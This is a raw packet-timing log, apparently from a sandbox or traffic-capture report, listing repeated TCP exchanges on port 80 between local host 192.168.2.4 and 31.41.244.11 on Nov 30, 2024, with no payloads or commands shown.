                                                      Nov 30, 2024 18:08:28.070995092 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.071057081 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.071316957 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.071357965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.072639942 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.072688103 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.072805882 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.072844028 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.075632095 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.075692892 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.075829983 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.075875044 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.078641891 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.078706980 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.078818083 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.078861952 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.081726074 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.081804037 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.081924915 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.081964016 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.084866047 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.084916115 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.085062027 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.085103989 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.087969065 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.088028908 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.088223934 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.088269949 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.091097116 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.091161013 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.091319084 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.091362953 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.094192982 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.094244957 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.094393015 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.094433069 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.097790956 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.097841024 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.097979069 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.098020077 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.100800037 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.100845098 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.100940943 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.100980043 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.103809118 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.103888035 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.104069948 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.104114056 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.106663942 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.106710911 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.106865883 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.106904984 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.109790087 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.109839916 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.109994888 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.110033989 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.113019943 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.113070965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.113235950 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.113280058 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.116075039 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.116123915 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.116242886 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.116281986 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.119111061 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.119153023 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.119327068 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.119371891 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.122236967 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.122297049 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.122438908 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.122481108 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.124349117 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.124411106 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.124541998 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.124588013 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.126424074 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.126473904 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.126681089 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.126720905 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.128484011 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.128524065 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.128662109 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.128700972 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.129914999 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.129956961 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.130069971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.130110025 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.131155014 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.131196022 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.131345987 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.131387949 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.132550955 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.132607937 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.132818937 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.132869959 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.133867025 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.133907080 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.134057999 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.134098053 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.135135889 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.135175943 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.135353088 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.135392904 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.136476040 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.136522055 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.136676073 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.136715889 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.137795925 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.137835026 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.138035059 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.138075113 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.139137983 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.139179945 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.139307022 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.139353991 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.140472889 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.140516996 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.140676022 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.140717983 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.141834974 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.141872883 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.141967058 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.142023087 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.143088102 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.143125057 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.143309116 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.143346071 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.144449949 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.144491911 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.144597054 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.144639969 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.145785093 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.145828009 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.145983934 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.146025896 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.147079945 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.147119999 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.147283077 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.147322893 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.148395061 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.148441076 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.148602962 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.148653030 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.149818897 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.149853945 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.150048971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.150089025 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.151074886 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.151114941 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.151242018 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.151281118 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.152396917 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.152436972 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.152592897 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.152636051 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.153707027 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.153757095 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.153909922 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.153949022 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.155052900 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.155088902 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.155299902 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.155339003 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.156364918 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.156404972 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.156532049 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.156570911 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.158181906 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.158231974 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.158483028 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.158528090 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.159413099 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.159456015 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.159574986 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.159614086 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.160562038 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.160614967 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.160672903 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.160712957 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.161658049 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.161701918 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.161886930 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.161928892 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.163005114 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.163047075 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.163172007 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.163211107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.164335966 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.164376974 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.164506912 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.164551973 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.165610075 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.165657043 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.165827990 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.165877104 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.166960955 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.167004108 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.167156935 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.167195082 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.168277025 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.168322086 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.168462038 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.168503046 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.169600010 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.169641018 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.169800043 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.169841051 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.170954943 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.170996904 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.171221972 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.171269894 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.276257038 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.276324987 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.276433945 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.276472092 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.276911974 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.276952982 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.277201891 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.277247906 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.278242111 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.278284073 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.278445005 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.278484106 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.279606104 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.279642105 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.279861927 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.279901028 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.280904055 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.280951023 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.281115055 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.281158924 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.282219887 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.282259941 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.282418013 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.282459974 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.283543110 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.283588886 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.283751011 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.283797026 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.284869909 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.284909964 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.285073042 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.285109997 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.286205053 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.286242962 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.286575079 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.286623001 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.287547112 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.287587881 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.287772894 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.287811041 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.288842916 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.288883924 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.289073944 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.289114952 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.290185928 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.290226936 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.290402889 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.290442944 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.291529894 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.291572094 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.291728973 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.291769028 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.292836905 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.292877913 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.293040991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.293081999 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.294761896 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.294795990 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.294878006 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.294914007 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.295743942 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.295779943 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.295979977 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.296015978 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.297111988 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.297168970 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.297252893 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.297288895 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.298160076 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.298207045 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.298377991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.298420906 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.299489021 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.299530983 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.299686909 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.299729109 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.300795078 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.300836086 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.301002026 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.301043034 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.302130938 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.302170992 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.302349091 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.302396059 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.303446054 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.303481102 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.303659916 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.303699970 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.304781914 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.304819107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.304999113 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.305037975 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.306098938 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.306139946 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.306315899 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.306350946 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.307416916 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.307482004 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.307620049 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.307657003 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.308731079 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.308770895 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.308938026 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.308978081 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.310101986 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.310146093 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.310307980 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.310345888 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.311439991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.311477900 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.311614037 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.311656952 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.312715054 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.312757015 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.312926054 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.312969923 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.314040899 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.314088106 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.314254999 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.314292908 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.315577030 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.315618038 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.316396952 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.316437960 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.318193913 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.318229914 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.319092035 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.319127083 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.319320917 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.319330931 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.319355965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.319371939 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.320087910 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.320099115 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.320132017 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.320143938 CET4980580192.168.2.431.41.244.11
